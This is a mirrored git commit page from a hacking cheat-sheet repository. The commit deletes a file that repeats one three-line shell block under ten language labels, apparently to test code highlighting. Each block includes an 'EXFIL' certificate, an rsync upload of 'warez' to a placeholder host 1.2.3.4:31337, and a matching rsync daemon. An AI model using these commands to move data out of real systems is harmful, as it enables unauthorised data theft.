mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 20:53:43 +02:00
list
This commit is contained in:
@@ -1,79 +0,0 @@
|
||||
applescript
|
||||
```applescript
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
elixir
|
||||
```elixir
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
julia
|
||||
```julia
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
livescript
|
||||
```livescript
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
pgsql
|
||||
```pgsql
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
php
|
||||
```php
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
powershell
|
||||
```powershell
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
r
|
||||
```r
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
ruby
|
||||
```ruby
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
|
||||
sql
|
||||
```sql
|
||||
# this is a comment
|
||||
openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509
|
||||
rsync -av warez rsync://1.2.3.4:31337/up
|
||||
rsync --daemon --port=31337 --config=r.conf --no-detach
|
||||
```
|
||||
Reference in New Issue
Block a user